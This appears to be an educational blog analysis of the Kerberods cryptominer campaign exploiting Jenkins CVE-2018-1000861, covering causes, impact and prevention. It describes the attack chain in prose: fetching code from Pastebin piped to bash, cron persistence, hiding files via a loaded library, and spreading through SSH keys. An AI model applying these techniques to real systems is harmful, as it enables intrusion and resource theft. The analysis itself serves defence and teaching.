Apache Jenkins Exploited to Mine Monero Cryptocurrency
A malicious campaign is currently in progress to exploit outdated Jenkins installations, allowing attackers to obtain root privileges and mine the Monero cryptocurrency. Details on the attack have been recently made available.
Why is it important?
The importance of the issue comes from the large scale of Jenkins. Jenkins is the leading open source project providing automation tools for continuous integration. It is widely used in the software industry and currently used by over 26000+ companies[1]. Therefore, this vulnerability can potentially compromise a wide scope of products and services. Especially since upon successful launch of the cryptocurrency miner, the program will attempt to spread the attack across the network using local SSH keys[2]. It is also known that the attackers have malicious intent and have the potential to do more harm than simply mine cryptocurrency. Researchers have also found that the vulnerability can be exploited for unauthenticated remote code execution[3].
This issue also highlights the security vulnerabilities and risks inherent in using third-party open source code. This is because the issue (ie. CVE-2018–1000861) stems from a vulnerability in the web framework named Stapler, that Jenkins uses to handle its HTTP requests[4]. This makes releasing fixes more difficult since Jenkins developers might not have the flexibility of modifying the Stapler codebase.
Who is affected?
All machines running installations of Jenkins’ with versions earlier than and including v2.153 are vulnerable to this attack. Jenkins released a security advisory[5] and released the patch for the fix in December 2018, when the issue was discovered[2]. Parties that were slow to update their installations are now the primary targets for the attacker. However, it has now been 6 months since the discovery of the vulnerability, what would be some factors that delay developers from updating their installations?
What impact might it have on people?
These attacks could eventually make its way to affecting the end-users of the software. This is because cryptocurrency mining is extremely demanding in terms of CPU and GPU usage and thus might degrade the performance of other processes and applications running on that same machine. An end-user might experience longer than usual response times from servers.
Furthermore, the attacker has the potential to obtain assets like data, passwords or business secrets, that are stored in the system once it gains root privileges. This can pose a serious privacy concern for business and individuals and can translate to huge losses for safety-critical systems.
What were the causes?
The cause was in the Stapler HTTP request handling framework. The idea behind Stapler was that it uses a set of naming conventions such that any code element (ie. a public method) that matches the Stapler naming convention could be accessible. Since these naming conventions closely match the common Java style conventions, an attacker can carefully craft a URL to invoke a method that was never meant to be invoked. This exposes a vast option of attacks such as invalidating all sessions as an unauthenticated user, creating new user objects in memory and manually kicking off instances of jobs (ie. the ‘AsyncPeriodicWork’ object) within the system[5].
This specific instance of the attack downloads and drops a malware called “Kerberods”. It exploits the vulnerability to curl raw code from Pastebin and pipe it to bash for execution[6]. Kerberods then attempts to get root access to the system and leverages these privileges to hide and persist itself. Kerberods persists itself through the creation of a cron job (cron is a UNIX utility allowing for the time-scheduling of jobs). It hides itself by loading a library into the operating system so that it prevents all users from opening the binary file for the crypto miner as well as the binary for the library itself. Furthermore, it hides network connections to the cryptocurrency mining pool[6]. The malware then installs and runs Monero cryptocurrency miner on the system, while terminating all other instances of cryptocurrency miners on the machine. It then spreads across the network using local SSH keys to search for other vulnerable systems.
How might similar problems be prevented in the future?
A very practical prevention method would be to regularly update all third party software and subscribe to their newsletters or in this case, security advisories. This allows developers to stay informed and to be able to quickly react to security vulnerabilities when they’re discovered. Another method of prevention is to look into how the third-party open-source software works and evaluate them for security vulnerabilities as opposed to treating the dependency as a black box.
Finally, the effects of this vulnerability can be minimized with monitoring tools that detect unknown processes or excessive and abnormal CPU usage. This allows developers to immediately recognize compromised systems, act to terminate the process(es) and work on a fix for the vulnerability. There are also proprietary automated security solutions that can be employed to monitor systems and detect vulnerabilities. An example of this includes the Trend Micro Hybrid Cloud Security solution[2].
It’s clear from this example that third-party open-source dependencies can also pose security risks to an application. However, benefits such as community support, development and maintenance make open source software feasible for commonly used libraries. What are some precautions or steps that developers should take before using open-source software? What are some cases in which open-source software should not be trusted or would be infeasible to implement?
— — — — — — — — — — — —
References:
[1] iDataLabs. Companies using Jenkins. https://idatalabs.com/tech/products/jenkins/
[2] Trend Micro. Jenkins Vulnerability Exploited to Drop Kerberods Malware and Launch Monero Miner, https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/jenkins-vulnerability-exploited-to-drop-kerberods-malware-and-launch-monero-miner
[3] Security Week, Jenkins Vulnerability Exploited to Deliver ‘Kerberods’ Malware https://www.securityweek.com/jenkins-vulnerability-exploited-deliver-kerberods-malware
[4] Common Vulnerabilities and Exposures (CVE). CVE-2019–1000861 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000861
[5] Jenkins. Jenkins Security Advisory 2018–12–05 https://jenkins.io/security/advisory/2018-12-05/
[6] Marinho, Renato. Vulnerable Apache Jenkins exploited in the wild https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916/
